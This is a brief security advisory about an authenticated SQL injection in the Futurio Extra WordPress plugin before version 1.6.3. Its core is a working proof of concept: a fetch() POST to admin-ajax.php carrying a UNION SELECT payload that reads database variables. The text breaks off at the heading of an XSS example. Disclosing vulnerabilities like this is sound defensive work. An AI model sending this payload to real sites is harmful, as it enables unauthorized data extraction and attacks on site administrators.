Futurio Extra < 1.6.3 - Authenticated SQL Injection

The plugin is affected by a SQL Injection vulnerability that could be used by high privilege users to extract data from the database as well as used to perform Cross-Site Scripting (XSS) against logged in admins by making send open a malicious link

PoC

Using SQLi to extract database variables: fetch(“http://example.com/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded” }, “body”: new URLSearchParams({“action”: “dilaz_mb_query_select”, “q”: ‘" union select 0,1,2,3,4,@@version,6,7,8,9,10,11,2,3,4,5,6,7,8,9,10,11,12 – g’, “query_args”: “YToxOntzOjE0OiJwb3N0c19wZXJfcGFnZSI7aTo1MDE7fQ==”, “query_type”: “post”}), “method”: “POST”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); Using SQLi for XSS (works in Firefox, not in Chrome due to same-site behavior):